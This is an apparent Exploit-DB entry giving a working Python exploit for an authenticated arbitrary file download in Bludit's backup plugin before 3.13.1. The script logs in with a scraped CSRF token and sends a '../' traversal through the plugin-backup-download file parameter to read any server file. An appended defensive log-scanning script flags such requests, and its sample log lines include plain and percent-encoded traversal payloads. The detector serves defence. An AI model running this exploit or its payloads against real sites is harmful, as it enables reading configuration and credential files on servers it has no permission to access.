

[webapps] Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authentica...
source link: https://www.exploit-db.com/exploits/51541

Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14
import sys
import requests
import argparse
from bs4 import BeautifulSoup  # pip3 install beautifulsoup4


def main():
    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True)
    parser.add_argument('-u', '--user', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    parser.add_argument('-f', '--file', type=str, required=True)
    args = parser.parse_args()
    print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)", "\nExploit Author: Antonio Cuomo (Arkantolo)\n")
    exploit(args)


def exploit(args):
    s2 = requests.Session()
    url = args.url.rstrip("/")

    # get csrf token from the admin login form
    r = s2.get(url + '/admin/')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'tokenCSRF'})['value']

    # login (the download endpoint requires an authenticated session)
    body = {'tokenCSRF': formtoken, 'username': args.user, 'password': args.password}
    r = s2.post(url + '/admin/', data=body, allow_redirects=False)
    if r.status_code == 301 and r.headers['location'].find('/admin/dashboard') != -1:
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        sys.exit(1)

    # arbitrary download: the 'file' parameter is not confined to the backup directory
    r = s2.get(url + '/plugin-backup-download?file=../../../../../../../../' + args.file)
    if r.status_code == 200 and len(r.content) > 0:
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        sys.exit(1)


if __name__ == '__main__':
    main()
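
A log check a defender could run for the request this script makes, as an added example that is not part of the original exploit or of Bludit's code: it flags requests to /plugin-backup-download whose file parameter, after repeated percent-decoding, contains a ".." segment or an absolute path. The combined access-log format, the backup file name and every sample line are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/plugin-backup-download"  # path requested by the script above
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')

# Constructed sample access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jul/2022:10:01:02 +0000] "GET /plugin-backup-download?file=backup-constructed.zip HTTP/1.1" 200 48211
203.0.113.9 - - [21/Jul/2022:10:03:15 +0000] "GET /plugin-backup-download?file=../../../../../../../../example.txt HTTP/1.1" 200 1397
203.0.113.9 - - [21/Jul/2022:10:03:40 +0000] "GET /plugin-backup-download?file=%2e%2e%2f%2e%2e%2fexample.txt HTTP/1.1" 200 912
203.0.113.9 - - [21/Jul/2022:10:04:02 +0000] "GET /plugin-backup-download?file=%252e%252e%252fexample.txt HTTP/1.1" 404 0
198.51.100.4 - - [21/Jul/2022:10:05:00 +0000] "GET /admin/dashboard HTTP/1.1" 200 5120
"""

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '../' is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_param):
    """True if the decoded value has a '..' segment or is an absolute path."""
    path = fully_decode(file_param).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_suspicious(log_text):
    """Return (client_ip, status, decoded_file) for traversal requests to ENDPOINT."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        if parts.path.rstrip("/") != ENDPOINT:
            continue
        for value in parse_qs(parts.query).get("file", []):  # parse_qs decodes once
            if is_traversal(value):
                hits.append((ip, status, fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and a non-empty response size is the case to triage first, since the script above treats exactly that response as a successful download.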